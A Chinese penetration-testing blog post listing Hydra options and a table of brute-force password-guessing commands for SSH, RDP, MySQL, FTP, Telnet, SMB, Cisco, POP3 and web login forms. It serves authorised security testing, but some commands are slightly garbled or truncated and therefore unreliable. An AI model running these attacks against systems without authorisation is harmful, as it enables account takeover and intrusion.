渗透测试-34:爆破工具
Hydra
# 常用参数: -R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 -P 指定密码字典(文件) -e 空密码探测和指定用户密码探测(ns) -C 用户名(username:password 可代替 -l username -p password) -o 输出文件 -t 指定多线程数量,默认为16个线程 -vV 显示详细过程 -f 爆破出结果后停止爆破
目标 | 命令 |
---|---|
ssh | hydra -L <用户名字典名> -P <密码字典> -vV -o ssh.log -e ns <目标IP> ssh -f |
rdp | hydra <目标IP> rdp -l <用户名> -P <密码字典> -V |
mysql | hydra -l <用户名> –P <密码字典> –e ns <目标IP> mysql |
ftp | hydra <目标IP> ftp -l 用户名 -P <密码字典> -t 线程(默认16) -vV hydra <目标IP> ftp -l 用户名 -P <密码字典> -e ns -vV |
telnet | hydra <目标IP> telnet -l 用户 -P <密码字典> -t 32 -s 23 -e ns -f -V |
https | hydra -m /index.php -l <用户名> -P <密码字典>.txt <目标IP> https |
teamspeak | hydra -l <用户名> -P <密码字典>.txt -s 端口号 -vV <目标IP> teamspeak |
cisco | hydra -P <密码字典>.txt <目标IP> cisco hydra -m cloud -P <密码字典>.txt <目标IP> cisco-enable |
smb | hydra -l <用户名> -P <密码字典>.txt <目标IP> smb |
pop3 | hydra -l <用户名> -P <密码字典> my.pop3.mail pop3 |
http-proxy | hydra -l <用户名> -P <密码字典> http-proxy://<目标IP> |
GET提交 | hydra -l <用户名> -p <密码字典> -t 线程 -vV -e ns <目标IP> http-get /admin/ hydra -l <用户名> -p <密码字典> -t 线程 -vV -e ns -f <目标IP> http-get /admin/index.php |
POST提交 | hydra -l <破解的用户名> -P <密码字典>.lst -o <输出的文件名>.lst -t <线程数> -f <目标IP> http-post-form "index.php:name=USER&pwd=PASS: |
本文作者:颜趣空间
本文链接:https://www.cnblogs.com/toki-plus/p/16286625.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步